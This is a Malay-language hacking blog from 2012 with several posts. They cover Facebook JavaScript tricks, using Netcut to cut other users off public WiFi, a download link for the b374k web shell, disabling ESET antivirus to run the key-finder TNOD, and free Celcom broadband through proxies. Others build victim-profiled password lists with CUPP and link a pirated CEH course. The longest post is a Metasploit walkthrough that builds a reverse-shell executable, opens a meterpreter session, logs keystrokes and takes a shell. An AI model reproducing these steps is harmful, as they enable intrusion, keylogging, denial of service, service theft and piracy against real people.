Hack Facebook Dengan Javascript Dan Greasemonkey

0 comments Saturday, April 14, 2012 jam 11:21 AM - Edit entry?
Seperti yang korang tahu Facebook jauh lebih popular dari laman sosial seperti Myspace, Friendster dan sebagainya. Tidak dinafikan kerana aku juga suka menggunakannya setelah pertama kali berdaftar dengan laman sosial ini. Oleh itu kali ini aku mahu korang mengenali lebih dekat dengan Facebook tentang bagaimana mahu “Hack” Facebook dengan beberapa kod javascript dan dengan menggunakan greasemonkey iaitu addons daripada Firefox. Maksud “Hack” disini bukanlah aku mahu mengajar korang bagaimana nak menceroboh akaun seseorang tetapi lebih kepada “Hack” yang bersifat sementara dan akan hilang apabila laman web tersebut di refreshkan.

Untuk mengetahui lebih lanjut bagaimana mahu “Hack” Facebookdengan kod javascript dan dengan menggunakan greasemonkey, sila ikuti beberapa cara yang disenaraikan dibawah :
Facebook Javascript “Hack” :
1.) Menukarkan Nama Title Profile Anda
Copy kod dibawah dan tukarkan “User” dengan nama anda. Pastekan pada address bar. Lihat contoh pada gambar diatas.
javascript:void(document.title="Facebook | User");
2.) Menukarkan Warna MenuBar
Hanya copy dan pastekan kod di bawah pada address bar dan tekan enter. Anda boleh menukar ‘yellow‘ dengan warna yang anda inginkan seperti black, green, white, red atau orange. Jika mahu menukarkan warna kepada asal tekan sahaja butang F5 iaitu butang refresh.
javascript:void(document.getElementById('fb_menubar').style.background='yellow');
3.) Melihat Offline Chat Pada Teman
Malangnya, dengan kod ini anda tidak dapat melihat history chat pada teman yang sedang online. Jika anda cuba mengingati sesuatu yang dikatakan, menunggu mereka untuk kembali online adalah salah satu yang membosankan. Sebaliknya, anda boleh menggunakan kod javascript ini. Pertama sekali, kita perlu mendapatkan Facebook ID teman anda.

Selepas anda mendapat ID seseorang, hanya copy dan pastekan kod dibawah pada address bar anda. Seterusnya gantikan “ID HERE” dengan ID teman anda.
javascript:buddyList.itemOnClick(ID HERE);
Beberapa Kod Javascript Yang Lain :
Berikut adalah beberapa trik lain anda boleh anda jalankan dengan menggunakan kod Javascript.
1.) Ubah status chat kepada offline
javascript:statusControl.sendVisibility(false);
2.) Ubah status chat kepada online
javascript:statusControl.sendVisibility(true);
3.) Tutup semua tetingkap bual dengan orang (ID HERE)
javascript:chatDisplay.tabs[ID HERE].tabXOnClick();
4.) Membuka aplikasi tab
javascript:applicationDock.toggleTab();
5.) Mempamerkan notis
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
6.) Mempamerkan senarai kawan
javascript:buddyList.toggleTab();
Facebook Greasemonkey “Hack” :
Greasemonkey adalah sal
ah satu addons Firefox yang terbaik yang ada. Dengan menggunakan userscripts ini, anda boleh melaraskan hampir setiap website.
Userscript ini akan secara automatik login masuk ke akaunFacebook, selama mana anda membuatkan Firefox mengingat password anda.
Userscript ini akan mewarnakan laman Facebook anda dengan menerapkan skema warna dari gambar yang dipaparkan pada laman. Seperti mana yang dapat anda bayangkan, hal ini boleh membuatkan laman Facebook anda kelihatan menarik.
Jika anda ingin membuang orang dengan banyak sekaligus. Userscript ini dapat membantu anda dengan senang tanpa membuang masa.
Userscript yang sering dikemaskini ini akan memadam semua iklan yang masuk dari Facebook, dan memberi keselesaan dan jaminan yang selamat bagi pengguna Facebook.

Potong Internet Orang Lain Meggunakan Netcut

2 comments Tuesday, April 10, 2012 jam 4:08 AM - Edit entry?
Selalunya kalau kita guna WiFi public mesti internet lambat kan? tak kira lah mana-mana WiFi yang ada. Boleh je kalau nak lajukan balik dengan menggunakan software "netcut". Konsep dia, kita dapat cut/disable internet terus ke device mereka dengan sekali klik je. Lepas tu, barulah kita dapat menggunakan kelajuan internet maksimum.

Note: Ini adalah untuk tujuan pembelajaran sahaja. 

Cara penggunaannya amat mudah. Selepas install ikut step di bawah.
  1. Pilih IP mangsa
  2. Cut!


Cara untuk melindungi korang dari serangan netcut ni adalah dengan menggunakan netcut juga. Nanti secara auto korang terselamat dari ancaman dari pihak lain yang ingin cut internet korang.

Jangan cut Gateway IP. Contoh macam gambar di atas ialah 192.168.42.254. Sebab IP tu adalah sumber internet korang.

 DOWNLOAD

Note: Pandai buat, pandai cover sendiri la. Kalau kantoi dengan orang lain jangan salahkan XLAWS pulak ye.


Shell b374k Newbie3viLc063s 2012

0 comments Saturday, April 7, 2012 jam 12:29 PM - Edit entry?

Assalamualaikum dan salam sejahtera...mesti banyak yang tahu kan shell b374k NEC?Ini adalah shell yang popular kerana mempunyai banyak fungsi.Shell ini telah di-mod oleh Newbie3viLc063s.

Baru-baru ini mereka telah released shell terbaru mereka!Kini dengan lebih banyak fungsi!

Jom tengok!

b374k Newbie3viLc063s 2012 R2
Thank to MadSpot Security Team & Alternator IWnet

New Function :-
-Zone-H 
-Symlink
-SQLI Scan 
-Website Whois 
-Port-Scanner 
-WP Reset 
-Jomlaa Reset
-CMS Scanner 
-VB Changer 
-About (http://translate.google.com/)
-Log-Out

pastebin
http://pastebin.com/k3B6xjEF

txt mirror
http://247worldhosting.com/~alternator/.shell./nec.mod.plain.txt

Thank to:Alex John

Cara-Cara Menggunakan TNOD Tanpa Disekat Oleh Antivirus

0 comments Sunday, April 1, 2012 jam 12:50 AM - Edit entry?
Setelah saya melihat ramai yang bertanya soalan mengenai TNOD di sekat dan dikuarantinkan oleh antivirus Eset di entri Eset Smart Security 5 : Rilisan Akhir Dilepaskan!.Saya rasa terpanggil untuk cuba menolong mereka yang menghadapi masalah ini walaupun saya tidak menggunakan Eset Smart Security ini. Jika ada kesalahan, harap ditegur dan dimaafkan. 



Cara yang pertama: 
  1. Sebelum menjalankan TNOD, anda mestilah matikan(disable) Real-time file system protection.Kemudian pergi ke Setup dan klik disable
  2. Jika sudah memberhentikan Antivirus anda itu, sila jalankan TNOD anda. Kemudian TNOD anda akan dapat beroperasi seperti biasa.

Note: Jika TNOD anda dikesan sebagai virus, fail TNOD itu akan ditempatkan di kuarantin, jadi anda perlu mengembalikannya semula(restore). (Real-time protection mestilah dimatikan dahulu) 

Cara yang kedua: 
  1. Muka-mula sekali pergi ke Setup dan matikan Real-time system protection
  2. Kemudian kamu pergi ke Enter advance setup dan klik pada komputer
  3. Selepas itu, anda perlu pilih Real-time system protection dan nyahtandakan(uncheck) semua ruang kotak bertanda dan klik OK.
  4. Dan akhir sekali jalankan TNOD anda.

Note: Jangan lupa untuk menghidupkan semula Real-time system protection anda, dan jangan lupa juga pergi ke Advance Setup dan tandakan semula ruang kotak yang tidak bertanda itu. 

Untuk cara yang ketiga anda tidak perlu mematikan Real-time system protection anda. 
  1. Pergi ke Setup, dan klik "Enter advance setup"
  2. Klik pada "Komputer" dan klik pada "+ Antivirus and Anti Spyware"
  3. Kemudian pilih "Exclusion"
  4. Klik pada "Add" dan cari direktori fail TNOD di C:\Program Files\TNod User & Password Finder (fail lalai selalunya di pasang di direktori ini)
  5. Klik OK
  6. Jika TNOD anda di pindahkan ke kuarantin, sila kembalikannya semula.
  7. Siap! Sekarang TNOD anda dapat beroperasi seperti biasa tanpa perlu mematikan Real-time system protection.

Sekian. 

HACK BROADBAND CELCOM

5 comments Saturday, March 31, 2012 jam 5:25 AM - Edit entry?
Hari ini aku nak ajar korang semua cara-cara nak menggunakan celcom broadband secara free, bermaksud walaupun credit celcom BB prepaid kita dah habis...atapun jika anda mempunyai USB Broadband,guna je celcom simkad yg korang guna hp sekarang....


 1. Mula-mula download ultrasurf 9.5 kat bawah sini

Donwload ultrasurf di sini http://ultrasurf.us/support.html

   
2. Dah download... Open la...

3. Dah Open,ok pilih ''option'', untick ''start ie automatically at start''.


4. Pastu turun bawah, click proxy setting, n then tick ''direct used ultra surf ''...

    kemudian exit..

5. Dalam browser yang korang guna tu, pergi kat "option" - "connection", set manual proxy 127.0.0.1 dengan port 9666



6. Sekarang connect 3G modem...ataupun jika anda mempunyai USB broadband maxis,atau mane2,masukkan je simkad celcom korang.Ade rezeki dapat lah.hehe

7. Dah connect, run ultrasurf 9.5, tunggu sampai dia cakap "successfully connected to server"

* Jika anda tak dapat connect guna ultrasurf tu. Sila Guna langkah ke-2 ini.

1. Dalam Ultrasurf  - "Option" - "Proxy Setting" - "Manual Proxy Setting" - "Proxy Host" 10.128.1.242 "Proxy Port" 8080 - Ok - Close ultasurf - lepas tu open balik


* Kalau tak boleh jugak
   
2. Bukak UltraSulrf balik - "Proxy Setting" - tick "Direct use ultrasurf"

Sekarang dah boleh open browser yang telah di set manual proxy tadi, confirm boleh surf, youtube dan download walaupun credit prepaid celcom bb dah habis.

Perhatian!! ...
Jangan try benda ni masa kredit simcard tengah ada/banyak sebab aku tak jamin dia tak tolak kredit, tapi kalau kredit simcard dah abis, tak dak masalah,

sekian.terima kasih...

Sumber dari:juzt2u, OMG! Hackers?

Tutorial Menggunakan CUPP Di Backtrack 5

0 comments Thursday, March 29, 2012 jam 9:23 AM - Edit entry?


Setelah Abg Saki godek-godek tools dalam Backtrack 5 ni. Abg Saki ada terjumpa satu tool ni namanya CUPP.CUPP adalah singkatan kepada Common User Passwords Profiler. Ianya boleh digunakan untuk menjana kata kunci berdasarkan maklumat yang diberi. Jadi hari ini Abg Saki akan ajar bagaimana untuk menjana kata kunci berdasarkan maklumat yang diberi. 

Untuk membukanya, anda boleh tekan pada Applications >> Backtrack >> Privilege Escalation >>Password Attacks >> Offline Attacks >> cupp 

Bagi mereka yang ingin membukanya menggunakan perintah. (saya lebih gemar cara menggunakan perintah) Anda boleh buka terminal anda dan taipkan perintah ini : 

root@bt:~#cd /pentest/passwords/cupp


Kemudian akan keluar seperti ini 

root@bt:/pentest/passwords/cupp#


Okay kita mulakan aktiviti kita sekarang. Anda taipkan perintah ini : 

root@bt:/pentest/passwords/cupp# ./cupp.py -i


Ianya akan keluar seperti di bawah ini. Dan anda taipkan segala maklumat yang anda ada diruang yang di sediakan. 

[+] Insert the informations about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

>Name:
>Surname:
>Nickname:
>Birthdate (DDMMYYYY):

>Wife's(husband's) name:
>Wife's(husband's) nickname:
>Wife's(husband's) birthdate (DDMMYYYY):

>Child's name:
>Child's nickname:
>Child's birthdate (DDMMYYYY):

>Pet's name:
>Company name:

>Do you want to add some key words about the victim? Y/[N]:
>Do you want to add special chars at the end of words? Y/[N]:
>Do you want to add some random numbers at the end of words? Y/[N]:
>Leet mode? (i.e. leet=1337) Y/[N]:


Selepas anda isi kesemua maklumat, anda akan dapat seperti ini 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to (nama fail kamu).txt, counting 12000 words.
[+] Now load your pistolero with (nama fail kamu).txt and shoot! Good luck!
root@bt:/pentest/passwords/cupp#


Sudah siap! Sekarang kamu taipkan perintah ini untuk melihat kata laluan yang dijana : 

root@bt:/pentest/passwords/cupp#vim (nama fail kamu).txt


Dan ianya akan senaraikan segala kata laluan yang berkaitan dengan maklumat yang diberi. Tetapi jika anda tidak dapat membukanya, anda boleh pergi ke Places >> Home Folder >> File System >> pentest >>passwords >> cupp >> (nama fail anda).txt 

Dengan cara ini secara tidak langsung anda boleh membuat senarai kamus sendiri tanpa perlu memuat turunnya di internet. 

Jika ada sebarang pertanyaan sila luangkan masa anda untuk komen diruang yang disediakan. Baiklah itu sahaja pada hari ini. Jikalau ada kelapangan masa, saya akan kongsikan lagi mengenai penggunaan tools lain yang terdapat dalam Backtrack 5 ini. Stay tuned.. 

Sekian. Credit

CEH V.7 - Certified Ethical Hacker Version 7

0 comments Wednesday, March 28, 2012 jam 10:54 AM - Edit entry?

Baiklah anda mesti sudah tahu mengenai Certified Ethical Hacker ini betul tak? Bagi yang tidak tahu,Certified Ethical Hacker ini adalah pengiktirafan profesional yang diberikan oleh International Council of E-Commerce Consultants (EC-Council) kepada mereka yang layak menerimanya. 

Ethical Hacker ini atau dalam bahasa melayunya penggodam beretika, selalunya mereka ini orang yang boleh dipercayai yang di lantik dalam sesebuah organisasi untuk menguji keselamatan jaringan(network) atau/dan sistem komputer dengan menggunakan cara yang penggodam lakukan. Tujuannya untuk mencari dan membaiki ruang sekuriti komputer tersebut. 

Kursus untuk versi 7 ini mempunyai 19 modul, iaitu: 

  1. Introduction to Ethical Hacking
  2. Footprinting and Reconnaissance
  3. Scanning Networks
  4. Enumeration
  5. System Hacking
  6. Trojans and Backdoors
  7. Viruses and Worms
  8. Sniffers
  9. Social Engineering
  10. Denial of Service
  11. Session Hijacking
  12. Hacking Webservers
  13. Hacking Web Applications
  14. SQL Injection
  15. Hacking Wireless Networks
  16. Evading IDS, Firewalls, and Honeypots
  17. Buffer Overflow
  18. Cryptography
  19. Penetration Testing

Anda mesti mahukan modul kursus ini betul tak? Boleh saja. Setelah saya mencari, akhirnya saya terjumpa satu fail yang lengkap dengan kursus dan alat-alatnya sekali. Ianya bersaiz 16GB! Menarik tak? Belum cukup menarik lagi. Heeee. Di dalam fail tersebut juga disertakan video untuk setiap tajuk modul kursus tersebut. Wow! Jadi apa pautannya? Sabar-sabar. Pautannya ialah di Lanunbay.org. 

Ianya adalah torrent jadi kepada sesiapa yang malas sangat nak menggunakan torrent ini dan ingin memuat turunnya secara terus anda boleh salin pautan ini dan pergi ke laman zbig.com dan tampalkan pautan yang telah anda salin tadi pada ruang yang di sediakan. Tetapi ianya hanya boleh di muat turun jika anda memiliki akaun premium, kerana hanya 8GB sahaja had yang dibenarkan untuk memuat turun bagi akaun percuma. Jadi nak tak nak kena guna torrent juga la. Itu sahaja yang dapat saya bantu anda. Selamat memuat turun dan di harap anda dapat menjadi penggodam yang beretika selepas ini. Hidup Penggodam Malaysia! 

Update download link: Anda boleh mencarinya di Hotfile. 

Sekian. Credit

Tutorial Metasploit Menggunakan Backtrack

0 comments jam 10:48 AM - Edit entry?
Metasploit adalah sumber terbuka rangka kerja(framework) untuk ujian penetrasi. Ianya digunakan untuk mengembangkan dan melaksanakan serangan terhadap sistem sasaran. Ia juga mempunyai pangkalan data yang besar dan boleh juga digunakan utnuk menulis eksploitasi zero-day kita sendiri. 


Di bawah ini saya senaraikan basic-basic term yang perlu anda tahu: 
  • Vulnerability: Kecacatan atau kelemahan dalam prosedur sekuriti sistem, reka bentuk atau pelaksanaan yang boleh dieksploitasikan sehingga menyebabkan kerosakkan.
  • Exploit: Sejenis perisian yang mengambil kesempatan terhadap bug atau vulnerability, yang boleh membawa kepada privilege escalation atau serangan DOS terhadap sasaran.
  • Overflow: Ralat yang disebabkan apabila sesuatu program itu cuba untuk menyimpan data di luar saiznya. Mungkin ianya digunakan untuk membolehkan penyerang untuk melaksanakan malicious code.
  • Payload: Kod sebenar yang dijalankan pada sistem yang dikompromi selepas eksploitasi.


Metasploit muncul dengan versi-versi berikut:
  • CLI (Command Line Interface)
  • Web Interface
  • MSF Console
  • MSFwx
  • MSFAPI

Untuk tutorial hari ini saya menggunakan MSF console kerana ianya mudah dan efektif. Jadi apa yang anda perlukan adalah Backtrack dan 2 komputer, iaitu satu tu untuk komputer anda dan satu lagi komputer sasaran. Ingat! Anda lakukan ini di network anda sendiri. Okay. Are you ready? Lets GO! 


Mula-mula sekali buka backtrack anda itu. Kalau tak tahu nak pasang anda boleh godek-godek blog ni untuk cari cara pemasangannya. Apa yang penting sekali anda perlu tahu Local IP anda. Anda buka terminal dan taipkan 

root@bt:~#ifconfig

Kemudian anda akan jumpa IP anda seperti 192.168.x.x atau 10.x.x.x 
Pastikan anda ingat IP anda itu. 


Langkah seterusnya anda pergi ke Applications >> Backtrack >> Exploitation Tools >> Network Exploitation Tools >> Metasploit Framework >> msfconsole 


Anda pasti akan mendapat shell yang sama seperti command prompt di dalam Windows.



Selepas itu anda membuka terminal dan taipkan perintah ini. Tujuannya untuk mencipta satu fail pelaksanaan yang membolehkan menghubungkan komputer kita dan komputer sasaran dengan menggunakan meterprete payload.

root@bt:~# cd /opt/framework3/msf3
root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="Local IP Anda" LPORT="Apa-apa sahaja Port" x > /root/Desktop/reverse_tcp.exe

Local IP anda itu adalah IP anda sendiri. Yang saya suruh ingat tadi. Kalau lupa tengok balik kat atas. Dan untuk port anda boleh pilih 4444. (Semua ini ditulis tanpa quotes.) 


Anda akan mendapat seperti ini: 

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/framework3/msf3#

Juga di desktop anda akan ada fail reverse_tcp.exe. 



Anda salin reverse_tcp.exe itu dan tampalkannya pada komputer sasaran anda yang menggunakan local network yang sama. Kemudian jalankannya. 



Kemudian anda buka semula msfconsole yang saya suruh buka tadi itu. Dan taipkan ini 

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

Baiklah semua sudah siap. Anda telah pun membuat fail pelaksanaan yang mana ianya akan balik semula connections itu kepada anda. 
Langkah terakhir adalah taipkan "exploit" dan tekan enter. 

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

Anda akan melihat meterpreter prompt seperti ni 

meterpreter >

Taipkan "ps" untuk mendapatkan senarai proses yang aktif 


meterpreter > ps

Kemudian cari perkataan "explorer.exe" dan pindahkannya ke proses. Anda perlu lihat pada nombor di sebelah explorer.exe. Sebagai contoh nombornya adalah 5716. Taipkan "migrate 5716" 


meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.

Kemudian taipkan perintah ini pula 

meterpreter > use priv

Jika anda mahu mulakan aktiviti keylogger, anda boleh taipkan ini 

meterpreter > keyscan_start 

Jika anda ingin pergi ke komputer sasaran anda itu. Anda boleh taipkan ini 

meterpreter > shell

Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

Anda boleh buat apa saja bila sudah masuk ke komputer sasaran. Dan jika nak kemabali ke meterpreter, anda taipkan perintah ini 

C:\Windows\system32> exit

Jika anda ingin melihat apa yang telah di taip pada komputer sasaran, anda taipkan ini 

meterpreter > keyscan_dump 


Sudah siap! Itu sahaja tutorial yang dapat saya ajar. Kalau anda ada tersalah langkah, ianya tidak akan menjadi. Saya telah mencubanya dua kali dan ianya memang menjadi. HAHA. Jadi apa tunggu lagi? Godam la komputer anda sendiri. :P 


P.S.: The above information is just for educational purposes only. You should test it against the computer you own. Kalau nak bertanya, jangan la tanya soalan-soalan yang tidak munasabah. Anda perlu buat dahulu, cuba buat sendiri. Jangan sebelum buat, dah tanya macam-macam. Itu tandanya anda MALAS. 


Rujukan : Metasploit Tutorial With Example 


Sekian. Credit
Related Posts Plugin for WordPress, Blogger...